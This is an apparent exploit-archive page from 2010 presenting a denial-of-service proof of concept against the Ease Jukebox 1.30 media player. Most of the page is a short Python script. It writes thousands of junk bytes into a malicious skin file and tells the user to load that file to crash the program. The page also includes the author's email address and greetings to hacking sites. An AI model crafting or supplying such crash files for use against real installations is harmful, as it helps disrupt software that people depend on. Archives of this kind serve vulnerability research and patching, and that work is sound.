[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ease Jukebox v1.30 Denial of Service Vulnerability
# Published : 2010-10-14
# Author : Sweet
# Previous Title : PCDJ Karaoki 0.6.3819 Denial of Service Vulnerability
# Next Title : Multiple Buffer Overflows in Winamp v5.5.8.2985


#Exploit Title :Ease Jukebox 1.30 Dos vulnerability 
#Software : Ease Jukebox 1.30
#Software link : http://www.mymusictools.com/all-in-one_jukebox_9/ease_jukebox_4040.htm
#Autor : Sweet
#Email : charif38@hotmail.fr
#Software version : 1.30
#Tested on : WinXP sp3 ENG vm
# (thx to Milw0rm.com , JF - Hamst0r - Keystroke) R.I.P  , inj3ct0r.com , exploit-db.com, packetstormsecurity.org, http://ha.ckers.org et 1,2,3 viva L'Algerie :))
#!/usr/bin/python
outfile="skin1.skn"
junk="x41" * 7000
FILE=open(outfile, "w") 
FILE.write(junk)
FILE.close()
print "[+] File created succesufully , copy the file into the skin folder , open the aplication and select skin1  [+]"